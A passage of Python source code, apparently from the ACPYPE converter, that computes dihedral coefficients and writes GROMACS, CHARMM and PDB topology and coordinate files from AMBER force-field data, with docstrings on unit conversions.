self.properDihedralsCoefRB = [ [atom1,..., atom4], C[0:5] ] For proper dihedrals: a quartet of atoms may appear with more than one set of parameters and to convert to GMX they are treated as RBs. The resulting coefs calculated here may look slighted different from the ones calculated by amb2gmx.pl because python is taken full float number from prmtop and not rounded numbers from rdparm.out as amb2gmx.pl does. 
""" properDihedralsCoefRB = [] properDihedralsAlphaGamma = [] properDihedralsGmx45 = [] for item in self.condensedProperDihedrals: V = 6 * [0.0] C = 6 * [0.0] for dih in item: period = dih.period # Pn kPhi = dih.kPhi # in rad phaseRaw = dih.phase * radPi # in degree phase = int(phaseRaw) # in degree if period > 4 and self.gmx4: self.printError("Likely trying to convert ILDN to RB, DO NOT use option '-z'") sys.exit(13) if phase in [0, 180]: properDihedralsGmx45.append([item[0].atoms, phaseRaw, kPhi, period]) if self.gmx4: if kPhi != 0: V[period] = 2 * kPhi * cal if period == 1: C[0] += 0.5 * V[period] if phase == 0: C[1] -= 0.5 * V[period] else: C[1] += 0.5 * V[period] elif period == 2: if phase == 180: C[0] += V[period] C[2] -= V[period] else: C[2] += V[period] elif period == 3: C[0] += 0.5 * V[period] if phase == 0: C[1] += 1.5 * V[period] C[3] -= 2 * V[period] else: C[1] -= 1.5 * V[period] C[3] += 2 * V[period] elif period == 4: if phase == 180: C[2] += 4 * V[period] C[4] -= 4 * V[period] else: C[0] += V[period] C[2] -= 4 * V[period] C[4] += 4 * V[period] else: properDihedralsAlphaGamma.append([item[0].atoms, phaseRaw, kPhi, period]) # print phaseRaw, kPhi, period if phase in [0, 180]: properDihedralsCoefRB.append([item[0].atoms, C]) # print properDihedralsCoefRB # print properDihedralsAlphaGamma self.printDebug("setProperDihedralsCoef done") self.properDihedralsCoefRB = properDihedralsCoefRB self.properDihedralsAlphaGamma = properDihedralsAlphaGamma self.properDihedralsGmx45 = properDihedralsGmx45 def writeCharmmTopolFiles(self): """Write CHARMM topology files""" self.printMess("Writing CHARMM files\n") # self.makeDir() at = self.atomType self.getResidueLabel() res = self.resName # self.residueLabel[0] # print res, self.residueLabel, type(self.residueLabel) cmd = ( "%s -dr no -i %s -fi mol2 -o %s -fo charmm -s 2 -at %s \ -pf y -rn %s" % (self.acExe, self.acMol2FileName, self.charmmBase, at, res) ) if self.debug: cmd = cmd.replace("-pf y", "-pf n") self.printDebug(cmd) log = _getoutput(cmd) if self.debug: self.printQuoted(log) def writePdb(self, file_): """ Write a new PDB file_ with the atom names defined by Antechamber Input: file_ path string The format generated here use is slightly different from http://www.wwpdb.org/documentation/format23/sect9.html respected to atom name """ # TODO: assuming only one residue ('1') pdbFile = open(file_, "w") fbase = os.path.basename(file_) pdbFile.write("REMARK " + head % (fbase, date)) id_ = 1 for atom in self.atoms: # id_ = self.atoms.index(atom) + 1 aName = atom.atomName if len(aName) == 2: aName = " %s " % aName elif len(aName) == 1: aName = " %s " % aName for ll in aName: if ll.isalpha(): s = ll break rName = self.residueLabel[0] x = atom.coords[0] y = atom.coords[1] z = atom.coords[2] line = "%-6s%5d %4s %3s Z%4d%s%8.3f%8.3f%8.3f%6.2f%6.2f%s%2s\n" % ( "ATOM", id_, aName, rName, 1, 4 * " ", x, y, z, 1.0, 0.0, 10 * " ", s, ) pdbFile.write(line) id_ += 1 pdbFile.write("END\n") def writeGromacsTopolFiles(self, amb2gmx=False): """ # from ~/Programmes/amber10/dat/leap/parm/gaff.dat #atom type atomic mass atomic polarizability comments ca 12.01 0.360 Sp2 C in pure aromatic systems ha 1.008 0.135 H bonded to aromatic carbon #bonded atoms harmonic force kcal/mol/A^2 eq. dist. Ang. comments ca-ha 344.3* 1.087** SOURCE3 1496 0.0024 0.0045 * for gmx: 344.3 * 4.184 * 100 * 2 = 288110 kJ/mol/nm^2 (why factor 2?) ** convert Ang to nm ( div by 10) for gmx: 1.087 A = 0.1087 nm # CA HA 1 0.10800 307105.6 ; ged from 340. 
bsd on C6H6 nmodes; PHE,TRP,TYR (from ffamber99bon.itp) # CA-HA 367.0 1.080 changed from 340. bsd on C6H6 nmodes; PHE,TRP,TYR (from parm99.dat) # angle HF kcal/mol/rad^2 eq angle degrees comments ca-ca-ha 48.5* 120.01 SOURCE3 2980 0.1509 0.2511 * to convert to gmx: 48.5 * 4.184 * 2 = 405.848 kJ/mol/rad^2 (why factor 2?) # CA CA HA 1 120.000 418.400 ; new99 (from ffamber99bon.itp) # CA-CA-HA 50.0 120.00 (from parm99.dat) # dihedral idivf barrier hight/2 kcal/mol phase degrees periodicity comments X -ca-ca-X 4 14.500* 180.000 2.000 intrpol.bsd.on C6H6 *convert 2 gmx: 14.5/4 * 4.184 * 2 (?) (yes in amb2gmx, not in topolbuild, why?) = 30.334 or 15.167 kJ/mol # X -CA-CA-X 4 14.50 180.0 2. intrpol.bsd.on C6H6 (from parm99.dat) # X CA CA X 3 30.334 0.000 -30.33400 0.000 0.000 0.000 ; intrpol.bsd.on C6H6 ;propers treated as RBs in GMX to use combine multiple AMBER torsions per quartet (from ffamber99bon.itp) # impr. dihedral barrier hight/2 phase degrees periodicity comments X -X -ca-ha 1.1* 180. 2. bsd.on C6H6 nmodes * to convert to gmx: 1.1 * 4.184 = 4.6024 kJ/mol/rad^2 # X -X -CA-HA 1.1 180. 2. bsd.on C6H6 nmodes (from parm99.dat) # X X CA HA 1 180.00 4.60240 2 ; bsd.on C6H6 nmodes ;impropers treated as propers in GROMACS to use correct AMBER analytical function (from ffamber99bon.itp) # 6-12 parms sigma = 2 * r * 2^(-1/6) epsilon # atomtype radius Ang. pot. well depth kcal/mol comments ha 1.4590* 0.0150** Spellmeyer ca 1.9080 0.0860 OPLS * to convert to gmx: sigma = 1.4590 * 2^(-1/6) * 2 = 2 * 1.29982 Ang. = 2 * 0.129982 nm = 1.4590 * 2^(5/6)/10 = 0.259964 nm ** to convert to gmx: 0.0150 * 4.184 = 0.06276 kJ/mol # amber99_3 CA 0.0000 0.0000 A 3.39967e-01 3.59824e-01 (from ffamber99nb.itp) # amber99_22 HA 0.0000 0.0000 A 2.59964e-01 6.27600e-02 (from ffamber99nb.itp) # C* 1.9080 0.0860 Spellmeyer # HA 1.4590 0.0150 Spellmeyer (from parm99.dat) # to convert r and epsilon to ACOEF and BCOEF # ACOEF = sqrt(e1*e2) * (r1 + r2)^12 ; BCOEF = 2 * sqrt(e1*e2) * (r1 + r2)^6 = 2 * ACOEF/(r1+r2)^6 # to convert ACOEF and BCOEF to r and epsilon # r = 0.5 * (2*ACOEF/BCOEF)^(1/6); ep = BCOEF^2/(4*ACOEF) # to convert ACOEF and BCOEF to sigma and epsilon (GMX) # sigma = (ACOEF/BCOEF)^(1/6) * 0.1 ; epsilon = 4.184 * BCOEF^2/(4*ACOEF) # ca ca 819971.66 531.10 # ca ha 76245.15 104.66 # ha ha 5716.30 18.52 For proper dihedrals: a quartet of atoms may appear with more than one set of parameters and to convert to GMX they are treated as RBs; use the algorithm: for(my $j=$i;$j<=$lines;$j++){ my $period = $pn{$j}; if($pk{$j}>0) { $V[$period] = 2*$pk{$j}*$cal; } # assign V values to C values as predefined # if($period==1){ $C[0]+=0.5*$V[$period]; if($phase{$j}==0){ $C[1]-=0.5*$V[$period]; }else{ $C[1]+=0.5*$V[$period]; } }elsif($period==2){ if(($phase{$j}==180)||($phase{$j}==3.14)){ $C[0]+=$V[$period]; $C[2]-=$V[$period]; }else{ $C[2]+=$V[$period]; } }elsif($period==3){ $C[0]+=0.5*$V[$period]; if($phase{$j}==0){ $C[1]+=1.5*$V[$period]; $C[3]-=2*$V[$period]; }else{ $C[1]-=1.5*$V[$period]; $C[3]+=2*$V[$period]; } }elsif($period==4){ if(($phase{$j}==180)||($phase{$j}==3.14)){ $C[2]+=4*$V[$period]; $C[4]-=4*$V[$period]; }else{ $C[0]+=$V[$period]; $C[2]-=4*$V[$period]; $C[4]+=4*$V[$period]; } } } """ self.printMess("Writing GROMACS files\n") self.setAtomType4Gromacs() self.writeGroFile() self.writeGromacsTop(amb2gmx=amb2gmx) self.writeMdpFiles() def setAtomType4Gromacs(self): """Atom types names in Gromacs TOP file are not case sensitive; this routine will append a '_' to lower case atom type. 
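# Illustration of the AMBER -> GROMACS unit conversions quoted in the
# docstring above, reproducing its ca-ha bond and ha Lennard-Jones numbers
# (input values as listed there for gaff.dat):
cal = 4.184                                    # kcal -> kJ
kb_amber, req_amber = 344.3, 1.087             # kcal/mol/A^2, Angstrom
kb_gmx = kb_amber * cal * 100 * 2              # -> 288110.24 kJ/mol/nm^2
req_gmx = req_amber / 10.0                     # -> 0.1087 nm
r_ha, eps_ha = 1.4590, 0.0150                  # LJ radius (A), well depth (kcal/mol)
sigma_gmx = r_ha * 2 ** (5.0 / 6.0) / 10.0     # -> 0.259964 nm
eps_gmx = eps_ha * cal                         # -> 0.06276 kJ/mol
assert round(kb_gmx, 2) == 288110.24
assert round(sigma_gmx, 6) == 0.259964
assert round(eps_gmx, 5) == 0.06276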
E.g.: CA and ca -> CA and ca_ """ if self.disam: self.printMess("Disambiguating lower and uppercase atomtypes in GMX top file.\n") self.atomTypesGromacs = self.atomTypes self.atomsGromacs = self.atoms return atNames = [at.atomTypeName for at in self.atomTypes] # print atNames delAtomTypes = [] modAtomTypes = [] atomTypesGromacs = [] dictAtomTypes = {} for at in self.atomTypes: atName = at.atomTypeName dictAtomTypes[atName] = at if atName.islower() and atName.upper() in atNames: # print atName, atName.upper() atUpper = self.atomTypes[atNames.index(atName.upper())] # print at.atomTypeName,at.mass, at.ACOEF, at.BCOEF # print atUpper.atomTypeName, atUpper.mass, atUpper.ACOEF, atUpper.BCOEF if at.ACOEF is atUpper.ACOEF and at.BCOEF is at.BCOEF: delAtomTypes.append(atName) else: newAtName = atName + "_" modAtomTypes.append(atName) atomType = AtomType(newAtName, at.mass, at.ACOEF, at.BCOEF) atomTypesGromacs.append(atomType) dictAtomTypes[newAtName] = atomType else: atomTypesGromacs.append(at) atomsGromacs = [] for a in self.atoms: atName = a.atomType.atomTypeName if atName in delAtomTypes: atom = Atom(a.atomName, dictAtomTypes[atName.upper()], a.id, a.resid, a.mass, a.charge, a.coords) atom.cgnr = a.cgnr atomsGromacs.append(atom) elif atName in modAtomTypes: atom = Atom(a.atomName, dictAtomTypes[atName + "_"], a.id, a.resid, a.mass, a.charge, a.coords) atom.cgnr = a.cgnr atomsGromacs.append(atom) else: atomsGromacs.append(a) self.atomTypesGromacs = atomTypesGromacs self.atomsGromacs = atomsGromacs # print [i.atomTypeName for i in atomTypesGromacs] # print modAtomTypes # print delAtomTypes def writeGromacsTop(self, amb2gmx=False): """Write GMX topology file""" if self.atomTypeSystem == "amber": d2opls = dictAtomTypeAmb2OplsGmxCode else: d2opls = dictAtomTypeGaff2OplsGmxCode topText = [] itpText = [] oitpText = [] otopText = [] top = self.baseName + "_GMX.top" itp = self.baseName + "_GMX.itp" otop = self.baseName + "_GMX_OPLS.top" oitp = self.baseName + "_GMX_OPLS.itp" headDefault = """ [ defaults ] ; nbfunc comb-rule gen-pairs fudgeLJ fudgeQQ 1 2 yes 0.5 0.8333 """ headItp = """ ; Include %s topology #include "%s" """ headOpls = """ ; Include forcefield parameters #include "ffoplsaa.itp" """ headSystem = """ [ system ] %s """ headMols = """ [ molecules ] ; Compound nmols """ headAtomtypes = """ [ atomtypes ] ;name bond_type mass charge ptype sigma epsilon Amb """ headAtomtypesOpls = """ ; For OPLS atomtypes manual fine tuning ; AC_at:OPLS_at:OPLScode: Possible_Aternatives (see ffoplsaa.atp and ffoplsaanb.itp) """ headMoleculetype = """ [ moleculetype ] ;name nrexcl %-16s 3 """ headAtoms = """ [ atoms ] ; nr type resi res atom cgnr charge mass ; qtot bond_type """ headBonds = """ [ bonds ] ; ai aj funct r k """ headPairs = """ [ pairs ] ; ai aj funct """ headAngles = """ [ angles ] ; ai aj ak funct theta cth """ headProDih = """ [ dihedrals ] ; propers ; treated as RBs in GROMACS to use combine multiple AMBER torsions per quartet ; i j k l func C0 C1 C2 C3 C4 C5 """ headProDihAlphaGamma = """; treated as usual propers in GROMACS since Phase angle diff from 0 or 180 degrees ; i j k l func phase kd pn """ headProDihGmx45 = """ [ dihedrals ] ; propers ; for gromacs 4.5 or higher, using funct 9 ; i j k l func phase kd pn """ headImpDih = """ [ dihedrals ] ; impropers ; treated as propers in GROMACS to use correct AMBER analytical function ; i j k l func phase kd pn """ # NOTE: headTopWaterTip3p and headTopWaterSpce actually do NOTHING # 
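# Standalone sketch (illustration only) of the case-clash handling described
# in setAtomType4Gromacs above: GROMACS atom type names are case-insensitive,
# so a lower-case GAFF type colliding with an upper-case AMBER one gets a
# trailing underscore.  (Simplified: the real code instead merges the two
# types when their Lennard-Jones parameters are identical.)
amber_types = ["CA", "ca", "HA", "c3"]
upper_names = {t for t in amber_types if not t.islower()}
gmx_types = [t + "_" if t.islower() and t.upper() in upper_names else t
             for t in amber_types]
assert gmx_types == ["CA", "ca_", "HA", "c3"]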
============================================================================================================== # _headTopWaterTip3p = """ # [ bondtypes ] # ; i j func b0 kb # OW HW 1 0.09572 462750.4 ; TIP3P water # HW HW 1 0.15139 462750.4 ; TIP3P water # # [ angletypes ] # ; i j k func th0 cth # HW OW HW 1 104.520 836.800 ; TIP3P water # HW HW OW 1 127.740 0.000 ; (found in crystallographic water with 3 bonds) # """ # # _headTopWaterSpce = """ # [ bondtypes ] # ; i j func b0 kb # OW HW 1 0.1 462750.4 ; SPCE water # HW HW 1 0.1633 462750.4 ; SPCE water # # [ angletypes ] # ; i j k func th0 cth # HW OW HW 1 109.47 836.800 ; SPCE water # HW HW OW 1 125.265 0.000 ; SPCE water # """ # ============================================================================================================== headNa = f""" [ moleculetype ] ; molname nrexcl NA+ 1 [ atoms ] ; id_ at type res nr residu name at name cg nr charge mass 1 %s 1 NA+ NA+ 1 1 22.9898 """ headCl = """ [ moleculetype ] ; molname nrexcl CL- 1 [ atoms ] ; id_ at type res nr residu name at name cg nr charge mass 1 %s 1 CL- CL- 1 -1 35.45300 """ headK = """ [ moleculetype ] ; molname nrexcl K+ 1 [ atoms ] ; id_ at type res nr residu name at name cg nr charge mass 1 %s 1 K+ K+ 1 1 39.100 """ headWaterTip3p = """ [ moleculetype ] ; molname nrexcl ; TIP3P model WAT 2 [ atoms ] ; nr type resnr residue atom cgnr charge mass 1 OW 1 WAT O 1 -0.834 16.00000 2 HW 1 WAT H1 1 0.417 1.00800 3 HW 1 WAT H2 1 0.417 1.00800 #ifdef FLEXIBLE [ bonds ] ; i j funct length force.c. 1 2 1 0.09572 462750.4 0.09572 462750.4 1 3 1 0.09572 462750.4 0.09572 462750.4 [ angles ] ; i j k funct angle force.c. 2 1 3 1 104.520 836.800 104.520 836.800 #else [ settles ] ; i j funct length 1 1 0.09572 0.15139 [ exclusions ] 1 2 3 2 1 3 3 1 2 #endif """ headWaterSpce = """ [ moleculetype ] ; molname nrexcl ; SPCE model WAT 2 [ atoms ] ; nr type resnr residue atom cgnr charge mass 1 OW 1 WAT O 1 -0.8476 15.99940 2 HW 1 WAT H1 1 0.4238 1.00800 3 HW 1 WAT H2 1 0.4238 1.00800 #ifdef FLEXIBLE [ bonds ] ; i j funct length force.c. 1 2 1 0.1 462750.4 0.1 462750.4 1 3 1 0.1 462750.4 0.1 462750.4 [ angles ] ; i j k funct angle force.c. 
2 1 3 1 109.47 836.800 109.47 836.800 #else [ settles ] ; OW funct doh dhh 1 1 0.1 0.16330 [ exclusions ] 1 2 3 2 1 3 3 1 2 #endif """ if self.direct and amb2gmx: self.printMess("Converting directly from AMBER to GROMACS.\n") # Dict of ions dealt by acpype emulating amb2gmx ionsDict = {"Na+": headNa, "Cl-": headCl, "K+": headK} ionsSorted = [] # NOTE: headWaterTip3p and headWaterSpce actually do the real thing # so, skipping headTopWaterTip3p and headWaterTip3p # headTopWater = headTopWaterTip3p headWater = headWaterTip3p nWat = 0 # topFile.write("; " + head % (top, date)) topText.append("; " + head % (top, date)) otopText.append("; " + head % (otop, date)) # topFile.write(headDefault) topText.append(headDefault) nSolute = 0 if not amb2gmx: topText.append(headItp % (itp, itp)) otopText.append(headOpls) otopText.append(headItp % (itp, itp)) itpText.append("; " + head % (itp, date)) oitpText.append("; " + head % (oitp, date)) self.printDebug("atomTypes %i" % len(self.atomTypesGromacs)) temp = [] otemp = [] for aType in self.atomTypesGromacs: aTypeName = aType.atomTypeName oaCode = d2opls.get(aTypeName, ["x", "0"])[:-1] aTypeNameOpls = oplsCode2AtomTypeDict.get(oaCode[0], "x") A = aType.ACOEF B = aType.BCOEF # one cannot infer sigma or epsilon for B = 0, assuming 0 for them if B == 0.0: sigma, epsilon, r0, epAmber = 0, 0, 0, 0 else: r0 = 0.5 * math.pow((2 * A / B), (1.0 / 6)) epAmber = 0.25 * B * B / A sigma = 0.1 * math.pow((A / B), (1.0 / 6)) epsilon = cal * epAmber if aTypeName == "OW": if A == 629362.166 and B == 625.267765: # headTopWater = headTopWaterSpce headWater = headWaterSpce # OW 629362.166 625.267765 spce # OW 581935.564 594.825035 tip3p # print aTypeName, A, B line = " %-8s %-11s %3.5f %3.5f A %13.5e %13.5e" % ( aTypeName, aTypeName, 0.0, 0.0, sigma, epsilon, ) + " ; %4.2f %1.4f\n" % (r0, epAmber) oline = "; %s:%s:opls_%s: %s\n" % (aTypeName, aTypeNameOpls, oaCode[0], repr(oaCode[1:])) # tmpFile.write(line) temp.append(line) otemp.append(oline) if amb2gmx: topText.append(headAtomtypes) topText += temp nWat = self.residueLabel.count("WAT") for ion in ionsDict: nIon = self.residueLabel.count(ion) if nIon > 0: idIon = self.residueLabel.index(ion) ionType = self.search(name=ion).atomType.atomTypeName ionsSorted.append((idIon, nIon, ion, ionType)) ionsSorted.sort() else: itpText.append(headAtomtypes) itpText += temp oitpText.append(headAtomtypesOpls) oitpText += otemp self.printDebug("GMX atomtypes done") if len(self.atoms) > 3 * nWat + sum([x[1] for x in ionsSorted]): nSolute = 1 if nWat: # topText.append(headTopWater) self.printDebug("type of water '%s'" % headWater[43:48].strip()) if nSolute: if amb2gmx: topText.append(headMoleculetype % self.baseName) else: itpText.append(headMoleculetype % self.baseName) oitpText.append(headMoleculetype % self.baseName) self.printDebug("atoms %i" % len(self.atoms)) qtot = 0.0 count = 1 temp = [] otemp = [] id2oplsATDict = {} for atom in self.atomsGromacs: resid = atom.resid resname = self.residueLabel[resid] if not self.direct: if resname in list(ionsDict) + ["WAT"]: break aName = atom.atomName aType = atom.atomType.atomTypeName oItem = d2opls.get(aType, ["x", 0]) oplsAtName = oplsCode2AtomTypeDict.get(oItem[0], "x") id_ = atom.id id2oplsATDict[id_] = oplsAtName oaCode = "opls_" + oItem[0] cgnr = id_ if self.sorted: cgnr = atom.cgnr # JDC charge = atom.charge mass = atom.mass omass = float(oItem[-1]) qtot += charge resnr = resid + 1 line = "%6d %4s %5d %5s %5s %4d %12.6f %12.5f ; qtot %1.3f\n" % ( id_, aType, resnr, resname, aName, cgnr, 
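# Round-trip check (illustration only) of the ACOEF/BCOEF <-> (r0, epsilon)
# relations used above for a same-type pair (i = j), with the gaff 'ha' values
# quoted in the docstring: ACOEF = eps*(2*r0)**12, BCOEF = 2*eps*(2*r0)**6.
import math

r0, eps = 1.4590, 0.0150                       # Angstrom, kcal/mol
A = eps * (2 * r0) ** 12
B = 2 * eps * (2 * r0) ** 6
r0_back = 0.5 * math.pow(2 * A / B, 1.0 / 6)   # same expression as in the code
eps_back = 0.25 * B * B / A
sigma_nm = 0.1 * math.pow(A / B, 1.0 / 6)      # GROMACS sigma in nm
assert abs(r0_back - r0) < 1e-9
assert abs(eps_back - eps) < 1e-9
assert abs(sigma_nm - r0 * 2 ** (5.0 / 6.0) / 10.0) < 1e-9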
charge, mass, qtot, ) # JDC oline = "%6d %4s %5d %5s %5s %4d %12.6f %12.5f ; qtot % 3.3f %-4s\n" % ( id_, oaCode, resnr, resname, aName, cgnr, charge, omass, qtot, oplsAtName, ) # JDC count += 1 temp.append(line) otemp.append(oline) if temp: if amb2gmx: topText.append(headAtoms) topText += temp else: itpText.append(headAtoms) itpText += temp oitpText.append(headAtoms) oitpText += otemp self.printDebug("GMX atoms done") # remove bond of water self.printDebug("bonds %i" % len(self.bonds)) temp = [] otemp = [] for bond in self.bonds: res1 = self.residueLabel[bond.atoms[0].resid] res2 = self.residueLabel[bond.atoms[0].resid] if "WAT" in [res1, res2]: continue a1Name = bond.atoms[0].atomName a2Name = bond.atoms[1].atomName id1 = bond.atoms[0].id id2 = bond.atoms[1].id oat1 = id2oplsATDict.get(id1) oat2 = id2oplsATDict.get(id2) line = "%6i %6i %3i %13.4e %13.4e ; %6s - %-6s\n" % ( id1, id2, 1, bond.rEq * 0.1, bond.kBond * 200 * cal, a1Name, a2Name, ) oline = "%6i %6i %3i ; %13.4e %13.4e ; %6s - %-6s %6s - %-6s\n" % ( id1, id2, 1, bond.rEq * 0.1, bond.kBond * 200 * cal, a1Name, a2Name, oat1, oat2, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headBonds) topText += temp else: itpText.append(headBonds) itpText += temp oitpText.append(headBonds) oitpText += otemp self.printDebug("GMX bonds done") self.printDebug("atomPairs %i" % len(self.atomPairs)) temp = [] for pair in self.atomPairs: # if not printed: # tmpFile.write(headPairs) # printed = True a1Name = pair[0].atomName a2Name = pair[1].atomName id1 = pair[0].id id2 = pair[1].id # id1 = self.atoms.index(pair[0]) + 1 # id2 = self.atoms.index(pair[1]) + 1 line = "%6i %6i %6i ; %6s - %-6s\n" % (id1, id2, 1, a1Name, a2Name) temp.append(line) temp.sort() if temp: if amb2gmx: topText.append(headPairs) topText += temp else: itpText.append(headPairs) itpText += temp oitpText.append(headPairs) oitpText += temp self.printDebug("GMX pairs done") self.printDebug("angles %i" % len(self.angles)) temp = [] otemp = [] for angle in self.angles: a1 = angle.atoms[0].atomName a2 = angle.atoms[1].atomName a3 = angle.atoms[2].atomName id1 = angle.atoms[0].id id2 = angle.atoms[1].id id3 = angle.atoms[2].id oat1 = id2oplsATDict.get(id1) oat2 = id2oplsATDict.get(id2) oat3 = id2oplsATDict.get(id3) line = "%6i %6i %6i %6i %13.4e %13.4e ; %6s - %-6s - %-6s\n" % ( id1, id2, id3, 1, angle.thetaEq * radPi, 2 * cal * angle.kTheta, a1, a2, a3, ) oline = "%6i %6i %6i %6i ; %13.4e %13.4e ; %6s - %-4s - %-6s %4s - %+4s - %-4s\n" % ( id1, id2, id3, 1, angle.thetaEq * radPi, 2 * cal * angle.kTheta, a1, a2, a3, oat1, oat2, oat3, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headAngles) topText += temp else: itpText.append(headAngles) itpText += temp oitpText.append(headAngles) oitpText += otemp self.printDebug("GMX angles done") self.setProperDihedralsCoef() self.printDebug("properDihedralsCoefRB %i" % len(self.properDihedralsCoefRB)) self.printDebug("properDihedralsAlphaGamma %i" % len(self.properDihedralsAlphaGamma)) self.printDebug("properDihedralsGmx45 %i" % len(self.properDihedralsGmx45)) temp = [] otemp = [] if self.gmx4: self.printMess("Writing RB dihedrals for old GMX 4.\n") for dih in self.properDihedralsCoefRB: a1 = dih[0][0].atomName a2 = dih[0][1].atomName a3 = dih[0][2].atomName a4 = dih[0][3].atomName id1 = dih[0][0].id id2 = dih[0][1].id id3 = dih[0][2].id id4 = dih[0][3].id oat1 = id2oplsATDict.get(id1) oat2 = id2oplsATDict.get(id2) oat3 = 
id2oplsATDict.get(id3) oat4 = id2oplsATDict.get(id4) c0, c1, c2, c3, c4, c5 = dih[1] line = "%6i %6i %6i %6i %6i %10.5f %10.5f %10.5f %10.5f %10.5f %10.5f" % ( id1, id2, id3, id4, 3, c0, c1, c2, c3, c4, c5, ) + " ; %6s-%6s-%6s-%6s\n" % (a1, a2, a3, a4) oline = "%6i %6i %6i %6i %6i ; %10.5f %10.5f %10.5f %10.5f %10.5f %10.5f" % ( id1, id2, id3, id4, 3, c0, c1, c2, c3, c4, c5, ) + " ; %6s-%6s-%6s-%6s %4s-%4s-%4s-%4s\n" % (a1, a2, a3, a4, oat1, oat2, oat3, oat4) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headProDih) topText += temp else: itpText.append(headProDih) itpText += temp oitpText.append(headProDih) oitpText += otemp self.printDebug("GMX proper dihedrals done") else: self.printMess("Writing GMX dihedrals for GMX 4.5 and higher.\n") funct = 9 # 9 for dih in self.properDihedralsGmx45: a1 = dih[0][0].atomName a2 = dih[0][1].atomName a3 = dih[0][2].atomName a4 = dih[0][3].atomName id1 = dih[0][0].id id2 = dih[0][1].id id3 = dih[0][2].id id4 = dih[0][3].id ph = dih[1] # phase already in degree kd = dih[2] * cal # kPhi PK pn = dih[3] # .period line = "%6i %6i %6i %6i %6i %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) oline = "%6i %6i %6i %6i %6i ; %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headProDihGmx45) topText += temp else: itpText.append(headProDihGmx45) itpText += temp oitpText.append(headProDihGmx45) oitpText += otemp # for properDihedralsAlphaGamma if not self.gmx4: funct = 4 # 4 else: funct = 1 temp = [] otemp = [] for dih in self.properDihedralsAlphaGamma: a1 = dih[0][0].atomName a2 = dih[0][1].atomName a3 = dih[0][2].atomName a4 = dih[0][3].atomName id1 = dih[0][0].id id2 = dih[0][1].id id3 = dih[0][2].id id4 = dih[0][3].id ph = dih[1] # phase already in degree kd = dih[2] * cal # kPhi PK pn = dih[3] # .period line = "%6i %6i %6i %6i %6i %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) oline = "%6i %6i %6i %6i %6i ; %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headProDihAlphaGamma) topText += temp else: itpText.append(headProDihAlphaGamma) itpText += temp oitpText.append(headProDihAlphaGamma) oitpText += otemp self.printDebug("GMX special proper dihedrals done") self.printDebug("improperDihedrals %i" % len(self.improperDihedrals)) temp = [] otemp = [] for dih in self.improperDihedrals: a1 = dih.atoms[0].atomName a2 = dih.atoms[1].atomName a3 = dih.atoms[2].atomName a4 = dih.atoms[3].atomName id1 = dih.atoms[0].id id2 = dih.atoms[1].id id3 = dih.atoms[2].id id4 = dih.atoms[3].id kd = dih.kPhi * cal pn = dih.period ph = dih.phase * radPi line = "%6i %6i %6i %6i %6i %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) oline = "%6i %6i %6i %6i %6i ; %8.2f %9.5f %3i ; %6s-%6s-%6s-%6s\n" % ( id1, id2, id3, id4, funct, ph, kd, pn, a1, a2, a3, a4, ) temp.append(line) otemp.append(oline) temp.sort() otemp.sort() if temp: if amb2gmx: topText.append(headImpDih) topText += temp else: itpText.append(headImpDih) itpText += temp oitpText.append(headImpDih) oitpText += otemp self.printDebug("GMX improper dihedrals done") if not self.direct: for ion in ionsSorted: topText.append(ionsDict[ion[2]] % 
ion[3]) if nWat: topText.append(headWater) topText.append(headSystem % (self.baseName)) topText.append(headMols) otopText.append(headSystem % (self.baseName)) otopText.append(headMols) if nSolute > 0: topText.append(" %-16s %-6i\n" % (self.baseName, nSolute)) otopText.append(" %-16s %-6i\n" % (self.baseName, nSolute)) if not self.direct: for ion in ionsSorted: topText.append(" %-16s %-6i\n" % (ion[2].upper(), ion[1])) if nWat: topText.append(" %-16s %-6i\n" % ("WAT", nWat)) if self.topo14Data.hasNondefault14(): citation = ( " BERNARDI, A., FALLER, R., REITH, D., and KIRSCHNER, K. N. ACPYPE update for\n" + " nonuniform 1-4 scale factors: Conversion of the GLYCAM06 force field from AMBER\n" + ' to GROMACS. SoftwareX 10 (2019), 100241. doi: 10.1016/j.softx.2019.100241"\n' ) msg = "Non-default 1-4 scale parameters detected. Converting individually. Please cite:\n\n" + citation self.printMess(msg) topText = self.topo14Data.patch_gmx_topol14("".join(topText)) gmxDir = os.path.abspath(".") topFileName = os.path.join(gmxDir, top) topFile = open(topFileName, "w") topFile.writelines(topText) if not amb2gmx: itpFileName = os.path.join(gmxDir, itp) itpFile = open(itpFileName, "w") itpFile.writelines(itpText) oitpFileName = os.path.join(gmxDir, oitp) oitpFile = open(oitpFileName, "w") oitpFile.writelines(oitpText) otopFileName = os.path.join(gmxDir, otop) otopFile = open(otopFileName, "w") otopFile.writelines(otopText) def writeGroFile(self): """Write GRO files""" # print "Writing GROMACS GRO file\n" self.printDebug("writing GRO file") gro = self.baseName + "_GMX.gro" gmxDir = os.path.abspath(".") groFileName = os.path.join(gmxDir, gro) groFile = open(groFileName, "w") groFile.write(head % (gro, date)) groFile.write(" %i\n" % len(self.atoms)) count = 1 for atom in self.atoms: coords = [c * 0.1 for c in atom.coords] resid = atom.resid line = "%5d%5s%5s%5d%8.3f%8.3f%8.3f\n" % ( resid + 1, self.residueLabel[resid], atom.atomName, count, coords[0], coords[1], coords[2], ) count += 1 if count == 100000: count = 0 groFile.write(line) if self.pbc: boxX = self.pbc[0][0] * 0.1 boxY = self.pbc[0][1] * 0.1 boxZ = self.pbc[0][2] * 0.1 vX = self.pbc[1][0] # vY = self.pbc[1][1] # vZ = self.pbc[1][2] if vX == 90.0: self.printDebug("PBC 